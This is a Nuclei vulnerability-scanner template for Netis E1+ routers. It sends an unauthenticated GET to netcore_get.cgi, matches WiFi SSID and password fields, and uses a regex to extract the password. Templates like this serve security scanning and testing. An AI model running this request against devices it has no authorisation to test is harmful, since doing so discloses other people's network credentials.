nuclei-templates/vulnerabilities/other/netis-info-leak.yaml

37 lines
818 B
YAML
Raw Normal View History

id: netis-info-leak
info:
name: Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak
author: gy741
2021-08-14 10:30:00 +00:00
severity: medium
2021-10-13 08:56:10 +00:00
description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device.
reference:
- https://www.exploit-db.com/exploits/48384
tags: netis,exposure
requests:
- raw:
- |
GET //netcore_get.cgi HTTP/1.1
Host: {{Hostname}}
Cookie: homeFirstShow=yes
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "rp_ap_password"
- "rp_ap_ssid"
part: body
condition: and
2021-08-14 10:23:30 +00:00
extractors:
- type: regex
part: body
regex:
- "'rp_soon_password':'([A-Za-z0-9]+)'"